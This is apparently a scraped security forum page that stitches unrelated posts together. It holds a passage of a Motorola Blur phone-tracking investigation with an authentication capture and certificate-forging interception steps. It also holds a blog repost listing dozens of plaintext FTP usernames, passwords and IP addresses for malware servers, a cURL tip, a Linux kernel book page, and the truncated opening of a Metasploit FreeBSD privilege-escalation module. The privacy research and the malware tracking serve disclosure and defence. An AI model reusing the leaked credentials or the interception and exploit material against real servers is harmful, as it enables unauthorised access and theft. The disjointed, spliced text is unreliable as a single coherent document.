[/TR] [TR] [TD=class: Data] 80 [/TD] [TD=class: Data] SNCommentsSyncHandler [/TD] [TD=class: Data] Syncs status/comment information from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [/TABLE] The "gpb" data format is how that type of binary encoding is referred to internally by the client logs. I believe it is similar (possibly identical) to Google's "protocol buffer" system. Here is an example session, including the SYNC APP command being sent by the server. Traffic from the client is represented in red. Traffic from the server is coloured blue. <stream:stream token="XXXXXXXXXXXXXXXX" to="jabber-cloud112-blur.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0"><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"/> <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0"> <stream:features><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"></starttls><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features><proceed xmlns="urn:ietf:params:xml:ns:xmpp-tls"/> [Communication after this point takes place over the encrypted channel which the client and server have negotiated.] <stream:stream token="XXXXXXXXXXXXXXXX" to="xmpp.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0"> <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0"><stream:features><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features> <iq id="4eTO3-24" type="set"><query xmlns="jabber:iq:auth"><username>4503600105521277</username><password>1-d052e26d5bbb5b4adce7965e3e248a331765623714</password><resource>BlurDevice</resource></query></iq><iq id="4eTO3-25" type="get"><query xmlns="jabber:iq:roster"></query></iq><presence id="4eTO3-26"></presence> <iq type="result" id="4eTO3-24"/> <message xmlns="urn:xmpp:motorola:motodata" id="0J8Hc-30570875" to="XXXXXXXXXXXXXXXX@jabber01.mm211.dc2b.svcmot.com"><data xmlns="com:motorola:blur:push:data:1">{"Sync":{"APP":[{"d":"sync_app_id: 31\n","q":0}]}}</data></message> [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] XMPP communication channel [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] XMPPPeek in action [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 31 (social networking status) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 40 (friends) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 50 (news) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 80 (social networking comments and status) sync [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] A few examples of the sync operations triggered by the XMPP communication channel. [/TD] [/TR] [/TABLE] While I have seen very little sensitive data being sent as a result of this mechanism, Motorola's privacy policy/terms-of-service related to this system makes me more concerned. There is literally no reason I can think of that I would want my phone to check in with Motorola every nine minutes to see if Motorola has any new instructions for it to execute. Is there some sort of remote-control capability intended for use by support staff? I know there is a device-location and remote wipe function, because those are advertised as features of Blur (apparently even if you didn't explicitly sign up for Blur). Speaking of that privacy policy... I honestly can't remember if I explicitly agreed to any sort of EULA when I originally set up my phone. There are numerous "terms of service" and "privacy policy" documents on the Motorola website which all seem designed to look superficially identical, but this one in particular (the one for the actual "Motorola Mobile Services" system (AKA "Blur")) has a lot of content I really don't like, and which is not present in the other, similar documents on their site that are much easier to find. For example, it specifically mentions capturing social networking credentials, as well as uploading GPS coordinates from customers' phones to Motorola. It is specific to "Motorola Mobile Services", and I know I didn't explicitly sign up for that type of account (which is probably why my phone is using a randomly-generated username and password to connect). I also know that even if I was presented with a lengthy statement which included statements about storing social media credentials, that happened when I originally bought the phone (about two years ago). Should I not have been at least reminded of this when I went to add a social networking account for the first time? Or at a bare minimum, should my phone not let me view any document I allegedly agreed to? The only reason I know of that particular TOS is because I found it referenced in a Motorola forum discussion about privacy concerns. In any case, here are some interesting excerpts from that document (as of 22 June, 2013). All bold emphasis is mine. I am not a lawyer, and this is not legal advice. Using the MOTOROLA MOBILE SERVICES software and services (MOTOROLA MOBILE SERVICES) constitutes your acceptance of the terms of the Agreement without modification. If you do not accept the terms of the Agreement, then you may not use MOTOROLA MOBILE SERVICES. Motorola collects and uses certain information about you and your mobile device ... (1) your device's unique serial number ... (5) when your device experiences a software crash ... (1) use of hardware functions like the accelerometer, GPS, wireless antennas, and touchscreen; (2) wireless carrier and network information; (3) use of accessories like headsets and docks; (4) data usage ... Personal Information such as: (1) your email and social network account credentials; (2) user settings and preferences; (3) your email and social network contacts; (4) your mobile phone number; and (5) the performance of applications installed on your device. ... MOTOROLA MOBILE SERVICES will never collect the specific content of your communications or copies of your files. The document makes a promise that the content of communications are not collected, but I have screenshots and raw data that show Facebook and Twitter messages as well as photos passing through their servers. The agreement specifies "when your device experiences a software crash", not "memory dumps taken at the time of a software crash", which are what is actually collected. Motorola takes privacy protection seriously. MOTOROLA MOBILE SERVICES only collects personal information, social network profile data, and information about websites you visit if you create a MotoCast ID, use the preinstalled web browser and/or MOTOROLA MOBILE SERVICES applications and widgets like Messaging, Gallery, Music Player, Social Networking and Social Status. If you use non-Motorola applications for email, social networking, sharing content with your friends, and web browsing, then MOTOROLA MOBILE SERVICES will not collect this information. Even if you decline to use the preinstalled browser or the MOTOROLA MOBILE SERVICES applications and widgets, your device will continue to collect information about the performance of your mobile device and how you use your mobile device unless you choose to opt out. In non-Motorola builds of Android, most/all of those components are still present, but none of them send data to Motorola. Some people might think it was extremely deceptive to add data collection to those components but not make user-visible changes to them that mentioned this. Oh, and of course the OS is still collecting massive amounts of data even if you don't use the modified basic Android functionality. MOTOROLA MOBILE SERVICES only collects and uses information about the location of your mobile device if you have enabled one or more location-based services, such as your device's GPS antenna, Google Location Services, or a carrier-provided location service. If you turn these features off in your mobile device's settings, MOTOROLA MOBILE SERVICES will not record the location of your mobile device. So what you're saying is that all I have to do to prevent Motorola from tracking my physical location is disable core functionality on my device and leave it off permanently? Awesome! Thanks so much! The security of your information is important to Motorola. When MOTOROLA MOBILE SERVICES transmits information from your mobile device to Motorola, MOTOROLA MOBILE SERVICES encrypts the transmission of that information using secure socket layer technology (SSL). Except when it doesn't, which is most of the time. However, no data stored on a mobile device or transmitted over a wireless or interactive network can ever be 100 percent secure, and many of the communications you make using MOTOROLA MOBILE SERVICES will be accessible to third parties. You should therefore be cautious when submitting any personally identifiable information using MOTOROLA MOBILE SERVICES, and you understand that you are using MOTOROLA MOBILE SERVICES at your own risk. As a global company, Motorola has international sites and users all over the world. The personal information you provide may be transmitted, used, stored, and otherwise processed outside of the country where you submitted that information, including jurisdictions that may not have data privacy laws that provide equivalent protection to such laws in your home country. You may not ... interfere with anyone's ... enjoyment of the Services Uh oh. That document does mention that anyone who wants to opt-out can email privacy@motorola.com. If you have any luck with that, please let me know. Why this is a problem While I'm sure there are a few people out there who don't mind a major multinational corporation collecting this sort of detailed tracking information related to where their phone has been and how it's been used, I believe most people would at least like to be asked about participating in this type of activity, and be given an option to turn it off. I can think of many ways that Motorola, unethical employees of Motorola, or unauthorized third parties could misuse this enormous treasure trove of information. But the biggest question on my mind is this: now that it is known that Motorola is collecting this data, can it be subpoenaed in criminal or civil cases against owners of Motorola phones? That seems like an enormous can of worms, even in comparison to the possibilities for identity theft that Motorola's system provides for. How secure is Motorola's Blur web service against attack? I'd be really interested to test this myself, but made no attempt to do so because I don't have permission and Motorola doesn't appear to have a "white hat"/"bug bounty" programme. It would be a tempting target for technically-skilled criminals, due to the large volume of Facebook, Twitter, and Google usernames and passwords stored in it. The fact that the phone actively polls Motorola for new instructions to execute and then follows those instructions without informing its owner opens all of these phones up to automated takeover by anyone who can obtain a signing SSL certificate issued by one of the authorities in the trusted CA store on those phones. Some people may consider this far-fetched, but consider that certificates of that type have been mistakenly issued in the past, and the root certificate for at least one of the CA's responsible for that type of mistake (TURKTRUST) were installed on my phone at the factory. Is there anything good to be found here? Motorola does appear to be using reasonably-strong authentication for the oAuth login to their system - the username seems to be a combination of the IMEI and a random number (16 digits long[2], in the case of my phone's username), and the password is a 160-bit value represented as a hex string. This would be essentially impossible to attack via brute-force if the value really is random. Due to its length, I'm concerned it's a hash of a fixed attribute of the phone, but that's just a hunch. The non-oAuth components (e.g. XMPP) use the Blur ID as the username, and that is all over the place, e.g. in virtually every URL (HTTP and HTTPS) that the client accesses on the Blur servers. When uploading images to social networking sites, the Motorola software on the phone sometimes strips the EXIF tags (including geolocation tags) before uploading the image to Motorola. So at least they can't always use that as another method for determining your location. Finally, both the XMPP and HTTPS client components of the software do validate that the certificates used for encrypted communication were issued by authorities the phone is configured to trust. If the certificate presented to either component is not trusted, then no encrypted channel is established, and data which would be sent over it is queued until a trusted connection can be made. If someone wants to perform a man-in-the-middle attack, they're going to need to get their root CA cert loaded on the target phones, or obtain a signing cert issued by a trusted authority (e.g. TURKTRUST). [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] At least their software checks SSL cert validity [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Untrusted cert - HTTPS client [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Untrusted cert - XMPP client [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Has anyone else discovered this? In January of 2012, a participant in a Motorola pre-release test discovered that Motorola was performing device-tracking after a Motorola support representative mentioned that the tester had reset his phone "21 times", and a forum moderator directed him to the special, hard-to-find Motorola privacy policy discussed above. To my knowledge, this article is the first disclosure of anything like the full extent of the data Motorola collects. What I am going to do as a result of this discovery As of 23 June 2013, I've removed my ActiveSync configuration from the phone, because I can't guarantee that proprietary corporate information isn't being funneled through Motorola's servers. I know that some information (like the name of our ActiveSync server, our domain name, and a few examples of our account-naming conventions) is, but I don't have time to exhaustively test to see what else is being sent their way, or to do that every time the phone updates its configuration. I've also deleted the IMAP configuration that connected to my personal email, and have installed K-9 Mail as a temporary workaround. I'm going to figure out how to root this phone and install a "clean" version of Android. That will mean I can't use ActiveSync (my employer doesn't allow rooted phones to connect), which means a major reason I use my phone will disappear, but better that than risk sending their data to Motorola. I'll assume that other manufacturers and carriers have their own equivalent of this - recall the Carrier IQ revelation from 2011. Which other models of Motorola device do this? Right now, I have only tested my Droid X2. If you have a Motorola device and are technically-inclined, the steps to reproduce my testing are in the section below. If you get results either way and would like me to include them here, please get in touch with me using the Contact form. Please include the model of your device, the results of your testing, and your name/nickname/handle/URL/etc. if you'd like to be identified. Steps to reproduce - HTTP/HTTPS data capture There are a number of approaches that can be used to reproduce the results in this article. This is the method that I used. Of course, the same testing can be performed in order to validate that non-Motorola devices are or are not behaving this way. Important: I strongly recommend that you do not modify in any way the data your phone sends to Motorola. I also strongly recommend that you do not actively probe, scan, or test in any way the Blur web service. The instructions on this page are intended to provide a means of passively observing the traffic to Motorola in order to understand what your phone may be doing without your knowledge or consent. Connect a wireless access point to a PC which has at least two NICs. Use Windows Internet Connection Sharing to give internet access to the wireless AP and its clients. Set up an intercepting proxy on the PC. I used Burp Suite Professional for the first part of my testing, then switched to OWASP ZAP (which is free) for the rest, since I used a personal system for that phase. Make sure the proxy is accessible on at least one non-loopback address so that other devices can proxy through it.[1] Configure a Motorola Android device to connect to the wireless AP, and to use the intercepting proxy for their web traffic (in the properties for that wireless connection). Install the root signing certificate for the intercepting proxy on the Motorola Android device. This allows the intercepting proxy to view HTTPS traffic as well as unencrypted HTTP. Power the Motorola Android device off, then back on. This seems to be necessary to cause all applications to recognize the new trusted certificate, and will also let you intercept the oAuth negotiation with Motorola./li> Configure and use anything in the Account section of the device. Use the built-in Social Networking application. Take a picture and use the Share function to upload it to one or more photo-sharing services. Leave the device on for long enough that it sends other system data to Motorola automatically. Steps to reproduce - check-in data decompression If you'd like to decompress one of these gzipped data packages, there are also a number of approaches available, but this is the one I used: Export the raw (binary) request from your intercepting proxy's proxy history. In ZAP, right-click on the history entry and choose Save Raw -> Request -> Body. In Burp Suite, right-click on the history entry and choose Save Item, then uncheck the Base64-encode requests and responses box before saving. Note: you cannot use the bulk export feature of either tool for this step to work - both of them have a quirk in which exporting individual requests preserves binary data, but exporting in bulk corrupts binary data by converting a number of values to 0x3F (maybe it's some Java library that does that when exporting as ASCII?). Open the exported data in a hex editor (I use WinHex). Remove everything up to the first 0x1F8B in the file. See example screenshot below. Save the modified version (I added a .gz extension for clarity). See example screenshot below. Decompress the resulting file using e.g. the Linux gzip -d command, or e.g. 7-zip. Open the decompressed file in a text editor that correctly interprets Unix-style line breaks (I used Notepad++, partly because it shows unprintable characters in a useful way, and there is some binary data mixed in with the text in these files). Examine the data your phone is sending to Motorola. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Manually removing extra data so the file will be recognized as gzipped [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] GZip header (0X1F8B) [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Hex editor view of the data [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Hex editing complete [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Steps to reproduce - XMPP communication channel This section requires more technical skill and time to replicate than the other two. Right now, it assumes that you have access to a Linux system that is set up with two network interfaces and which can be easily configured to forward all network traffic from the first interface to the second using iptables. If you have a system that is set up to run Mallory successfully already (even though you won't be using Mallory itself here), that would be ideal. I am preparing a detailed ground-up build document and will release that shortly. In the meantime, assuming you have such a system and some experience using this sort of thing, download XMPPPeek and you should have the tool you need. Generate an SSL server certificate and private key (in PEM format) with the common name of *.svcmot.com. I made all of the elements of my forged cert match the real one as closely as possible, but I don't know how important this is other than the common name. Load the CA cert you signed the *.svcmot.com cert with onto your Motorola Android device. Again, I used a CA cert that matched the human-readable elements of the one used by the real server, but I don't know how important that is in this specific case. You may need to explicitly install the forged *.svcmot.com cert onto your Motorola Android device as well. Run the shell script from the XMPPPeek page to cause all traffic from the internal interface to be forwarded to the external interface, with the exception of traffic with a destination port of 5222, which should be routed to the port that XMPPPeek will be listening on. Start XMPPPeek and wait for your phone to connect. I used a VirtualBox VM with a virtual NIC which was connected for internet access, and a USB NIC which I connected to an old wireless access point. So my phone connected to that AP, which connected through the man-in-the-middle system, which connected to the actual internet connection. I configured the phone to also proxy web traffic through OWASP ZAP so that I could match up the XMPP traffic with its HTTP and HTTPS counterparts. Footnotes [TABLE=class: FootnoteTable] [TR] [TD=class: FootnoteNumberCell] 1. [/TD] [TD=class: FootnoteContentCell] For example, with the default Windows ICS configuration, you can bind the proxy to 192.168.137.1:8071. [/TD] [/TR] [TR] [TD=class: FootnoteNumberCell] 2. [/TD] [TD=class: FootnoteContentCell] Mine starts with a 4, but does not pass a Luhn check, in case you were curious. [/TD] [/TR] [/TABLE] Sursa: Motorola Is Listening - Projects - Beneath the Waves
-
Infiltrating malware servers without doing anything
Nytro replied to Nytro's topic in Tutoriale in engleza
cURL-ul pulii... Pentru cei care mai fac request-uri cu cacatul de cURL, la URL aveti grija sa dati replace la spatii cu "+": curl_setopt ($ch, CURLOPT_URL, str_replace(' ', '+', $_GET['url'])); -
[h=3]Infiltrating malware servers without doing anything[/h] Today i was searching more samples of BlackPOS because this malware use FTP protocol. And knowing this, i was interested to crawl more panels but then i realised something... Why did i look only for BlackPOS, instead of targeting everything ? So i downloaded a random malware pack found on internet and send everything to Cuckoo. After i've just parsed each of these generated pcaps to get some stuff (simple but effective) Everything automated of course, it's too enormous to do that manually, especially on malware pack. Cuckoo. pcap junkie. Here is a small part: ftp://u479622:y6yf2023@212.46.196.140 - Win32/Usteal ftp://4bf3-cheats:hydsaww56785678@193.109.247.80 - Win32/Usteal ftp://u445497390:090171qq@31.170.164.56 - Win32/Usteal ftp://raprap8:9Y7cGxOW@89.108.68.81 - Win32/Usteal ftp://u195253707:1997qwerty@31.170.165.230 - Win32/Usteal ftp://pronzo_615:f4690x0nq8@91.223.216.18 - Win32/Usteal ftp://lordben8:xCoMFM2c@89.108.68.89 - Win32/Usteal ftp://u698037800:denisok1177@31.170.165.251 - Win32/Usteal ftp://u268995895:vovamolkov123@31.170.165.187 - Win32/Usteal ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A ftp://oiadoce:cremado33@187.17.122.141 - Win32/Delf.P ftp://cotuno:nokia400@198.23.57.29 - Win32/SecurityXploded.A ftp://fake01:13758@81.177.6.51 - WS.Reputation.1 ftp://h51694:2222559@91.227.16.13 - Win32/Usteal ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Usteal ftp://h51694:2222559@91.227.16.13 - Win32/Ganelp.E ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A ftp://getmac:8F4ODYLQlvpjjQ==@222.35.250.56 - Win32/Ganelp.G ftp://u797638036:951753zx@31.170.165.29 - Virus.Downloader.Rozena ftp://b12_8082975:djdf3549384@10.0.2.15 - Win32/Ganelp.gen!A ftp://onthelinux:741852abc@209.202.252.54 - Win32/Ganelp.E ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.E ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A ftp://u206748555:as3515789@31.170.165.165 - Win32/Usteal ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal ftp://griptoloji:3INULAX@46.16.168.174 - Win32/Usteal ftp://u459704296:ded7753191ded@31.170.164.244 - Win32/Usteal ftp://dedmen2:reaper24chef@176.9.52.231 - Win32/Usteal ftp://srv35913:JLN18Hp7@78.110.50.123 - F*ck this shit ftp://ftp1970492:ziemniak123@213.202.225.201 - F*ck this shit ftp://dron2258:NRm8CNfW@89.108.68.89 - F*ck this shit ftp://u996543000:123456789a@31.170.165.235 - F*ck this shit ftp://u500739002:jd7H2ni99s@31.170.165.199 - F*ck this shit ftp://0dmaer:1780199d@193.109.247.83 - F*ck this shit ftp://u404100999:vardan123@31.170.164.25 - F*ck this shit ftp://a9951823:www.ry123456@31.170.161.56 - F*ck this shit ftp://u194291799:80997171405@31.170.165.18 - F*ck this shit ftp://u478149:qqgclnbi@212.46.196.140 - F*ck this shit ftp://u114972719:1052483w@31.170.165.192 - F*ck this shit ftp://a1954396:omeromer123@31.170.162.103 - F*ck this shit ftp://googgle.ueuo.com:741852@5.9.82.27 - F*ck this shit ftp://fr32920:Nw3hRUme@92.53.98.21 - F*ck this shit ftp://u974422848.root:vertrigo@31.170.164.119 - F*ck this shit ftp://u205783311:gomogej200897z@31.170.165.192 - F*ck this shit ftp://u188483768:andrewbogdanov1@31.170.165.251 - F*ck this shit ftp://coinmint@coinslut.com:c01nm1nt!@108.170.30.2 - F*ck this shit ftp://agooga:nokiamarco@198.23.57.29 - F*ck this shit ftp://nicusn:n0305441@198.23.57.29 - F*ck this shit ftp://u355595964:xmNmK4CfvX@31.170.165.193 - F*ck this shit ftp://fmstu421:oxjQG1i7@46.4.94.180 - F*ck this shit ftp://u651787226:123698745s@31.170.164.98 - F*ck this shit ftp://u492312765:530021354@31.170.165.250 - F*ck this shit ftp://mandaryn:m0jak0chanaania@213.180.150.18 - F*ck this shit ftp://spechos8:onxGoTDG@89.108.68.85 - F*ck this shit ftp://6fidaini:vardan123@193.109.247.80 - F*ck this shit ftp://8steamsell:frozenn1@195.216.243.45 - F*ck this shit ftp://u478644:57zw1q56@212.46.196.138 - F*ck this shit ftp://u478230:lytlz3ub@212.46.196.133 - F*ck this shit ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit ftp://sme8:y6kByIZA@89.108.68.85 - F*ck this shit ftp://koctbijib1@mail.ru:83670bb9072b@93.189.41.100 - F*ck this shit ftp://u457127536:741852963q@31.170.165.245 - F*ck this shit ftp://u450728967:987456987@31.170.165.187 - F*ck this shit ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit ftp://0lineage2-world:plokijuh@195.216.243.7 - F*ck this shit ftp://expox@1:0628262733Y@188.40.138.148 - F*ck this shit ftp://admin@enhanceviews.elementfx.com:123456@198.91.81.3 - F*ck this shit ftp://ih_3676461:123456@209.190.85.253 - F*ck this shit ftp://0alfa-go-cs:killer2612@195.216.243.45 - F*ck this shit ftp://5nudapac:nudapac@195.216.243.82 - F*ck this shit ftp://450857:6a5124c7@83.125.22.167 - F*ck this shit I've added signature manually by browsing VirusTotal report but i got too many results so i've just leaved 'F*ck this shit' to all of them. Crawling VirusTotal with the API can be also an idea to retrieve results but i'm lazy. Looking at random pcap i've found some was fun: Malware using free hosting service is a bad idea: Malware builded with wrong datas (epic failure) Malware badly coded: Infecting yourself with Ardamax and enabling all features on it is a bad idea: Another configuration failure: FTP's full of sh*t: You can learn about actors, eg from dedmen2@176.9.52.231, emo boy (i've included him on the ftp list): Protip: don't buy a Nikon Coolpix L14v1.0, low quality picture. I got also some false positive, this one is fun because it's a server against malware infection: I have no idea why UsbFix was on a malware pack, anyway the use of FTP protocol for legit tools is also a bad idea, and this is not the only 'anti-malware' server i've found, got some weird stuff for viral update and many others, this technic is a double edged sword but most of result lead on malware servers. Posted by Steven K at 00:18 Sursa: XyliBox: Infiltrating malware servers without doing anything
-
Linux Kernel in a Nutshell This is the web site for the book, Linux Kernel in a Nutshell, by Greg Kroah-Hartman, published by O'Reilly. About [TABLE] [TR] [TD] To quote the "official" O'Reilly site for the book: Written by a leading developer and maintainer of the Linux kernel, Linux Kernel in a Nutshell is a comprehensive overview of kernel configuration and building, a critical task for Linux users and administrators. No distribution can provide a Linux kernel that meets all users' needs. Computers big and small have special requirements that require reconfiguring and rebuilding the kernel. Whether you are trying to get sound, wireless support, and power management working on a laptop or incorporating enterprise features such as logical volume management on a large server, you can benefit from the insights in this book. Linux Kernel in a Nutshell covers the entire range of kernel tasks, starting with downloading the source and making sure that the kernel is in sync with the versions of the tools you need. In addition to configuration and installation steps, the book offers reference material and discussions of related topics such as control of kernel options at runtime. A key benefit of the book is a chapter on determining exactly what drivers are needed for your hardware. Also included are recipes that list what you need to do to accomplish a wide range of popular tasks. To quote me, the author of the book: If you want to know how to build, configure, and install a custom Linux kernel on your machine, buy this book. It is written by someone who spends every day building, configuring, and installing custom kernels as part of the development process of this fun, collaborative project called Linux. I'm especially proud of the chapter on how to figure out how to configure a custom kernel based on the hardware running on your machine. This is an essential task for anyone wanting to wring out the best possible speed and control of your hardware. [/TD] [TD][/TD] [/TR] [/TABLE] Audience This book is intended to cover everything that is needed to know in order to properly build, customize, and install the Linux kernel. No programming experience is needed to understand and use this book. Some familiarity with how to use Linux, and some basic command-line usage is expected of the reader. This book is not intended to go into the programming aspects of the Linux kernel; there are many other good books listed in the Bibliography that already cover this topic. Secret Goal (i.e. why I wrote this book and am giving it away for free online) I want this book to help bring more people into the Linux kernel development fold. The act of building a customized kernel for your machine is one of the basic tasks needed to become a Linux kernel developer. The more people that try this out, and realize that there is not any real magic behind the whole Linux kernel process, the more people will be willing to jump in and help out in making the kernel the best that it can be. License This book is available under the terms of the Creative Commons Attribution-ShareAlike 2.5 license. That means that you are free to download and redistribute it. The development of the book was made possible, however, by those who purchase a copy from O'Reilly or elsewhere. Kernel version The book is current as of the 2.6.18 kernel release, newer kernel versions will cause some of the configuration items to move around and new configuration options will be added. However the main concepts in the book still remain for any kernel version released. Downloads The book is available for download in either PDF or DocBook format for the entire book, or by the individual chapter. The entire history of the development of the book (you too can see why the first versions of the book were 1000 pages long) can be downloaded in a git repository. Linux Kernel in a Nutshell chapter files: [TABLE] [TR=class: Odd] [TD]Title page[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [TR=class: Even] [TD]Copyright and credits[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [TR=class: Odd] [TD]Preface[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part I: Building the Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 1: Introduction[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 2: Requirements for Building and Using the Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 3: Retrieving the Kernel Source[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 4: Configuring and Building[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 5: Installing and Booting from a Kernel [/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 6: Upgrading a Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Part II: Major Customizations[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 7: Customizing a Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 8: Kernel Configuration Recipes[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part III: Kernel Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 9: Kernel Boot Command-Line Parameter Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 10: Kernel Build Command-Line Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 11: Kernel Configuration Option Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part IV: Additional Information[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Appendix A: Helpful Utilities[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Appendix B: Bibliography[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Index[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [/TABLE] Full Book Downloads: [TABLE] [TR=class: even] [TD] Tarball of all LKN PDF files (3MB)[/TD] [/TR] [TR=class: even] [TD] Tarball of all LKN DocBook files (1MB)[/TD] [/TR] [/TABLE] git tree of the book source can be browsed at http://git2.kernel.org/git/?p=linux/kernel/git/gregkh/lkn.git. To clone this tree, run: git clone git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/lkn.git Sursa: Linux Kernel in a Nutshell
-
[h=1]FreeBSD 9 Address Space Manipulation Privilege Escalation[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info={}) super( update_info( info, { 'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability that can be used to modify portions of a process's address space, which may lead to privilege escalation. Systems such as FreeBSD 9.0 and 9.1 are known to be vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Konstantin Belousov', # Discovery 'Alan Cox', # Discovery 'Hunger', # POC 'sinn3r' # Metasploit ], 'Platform' => [ 'bsd' ], 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'References' => [ [ 'CVE', '2013-2171' ], [ 'OSVDB', '94414' ], [ 'EDB', '26368' ], [ 'BID', '60615' ], [ 'URL', 